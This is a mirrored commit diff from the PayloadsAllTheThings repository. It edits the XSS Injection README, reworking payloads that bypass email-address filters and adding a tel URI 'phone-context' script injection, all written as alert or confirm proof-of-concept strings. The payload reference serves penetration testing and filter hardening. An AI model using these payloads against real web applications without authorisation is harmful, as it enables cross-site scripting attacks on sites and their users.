Mirrors/PayloadsAllTheThings
2
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-11-10 07:04:22 +00:00
Code Issues Projects Releases Packages Wiki Activity

XSS Tel URI

Browse source
This commit is contained in:
Swissky 2024-06-03 09:37:24 +02:00
parent 6d3fef0df3
commit 2e73069238
1 changed files with 19 additions and 7 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

26
XSS Injection/README.md
View file

@ -775,19 +775,31 @@ $ echo "<svg^Lonload^L=^Lalert(1)^L>" | xxd
00000010: 6572 7428 3129 0c3e 0a ert(1).>. 00000010: 6572 7428 3129 0c3e 0a ert(1).>.
``` ```
### Bypass email filter ### Bypass email filter
([RFC compliant](http://sphinx.mythic-beasts.com/~pdw/cgi-bin/emailvalidate)) * [RFC0822 compliant](http://sphinx.mythic-beasts.com/~pdw/cgi-bin/emailvalidate)
```javascript
"><svg/onload=confirm(1)>"@x.y
```
* [RFC5322 compliant](https://0dave.ch/posts/rfc5322-fun/)
```javascript
xss@example.com(<img src='x' onerror='alert(document.location)'>)
```
### Bypass tel URI filter
At least 2 RFC mention the `;phone-context=` descriptor:
* [RFC3966 - The tel URI for Telephone Numbers](https://www.ietf.org/rfc/rfc3966.txt)
* [RFC2806 - URLs for Telephone Calls](https://www.ietf.org/rfc/rfc2806.txt)
```javascript ```javascript
"><svg/onload=confirm(1)>"@x.y +330011223344;phone-context=<script>alert(0)</script>
``` ```
([RFC5322 compliant](https://0dave.ch/posts/rfc5322-fun/))
```javascript
xss@example.com(<img src='x' onerror='alert(document.location)'>)
```
### Bypass document blacklist ### Bypass document blacklist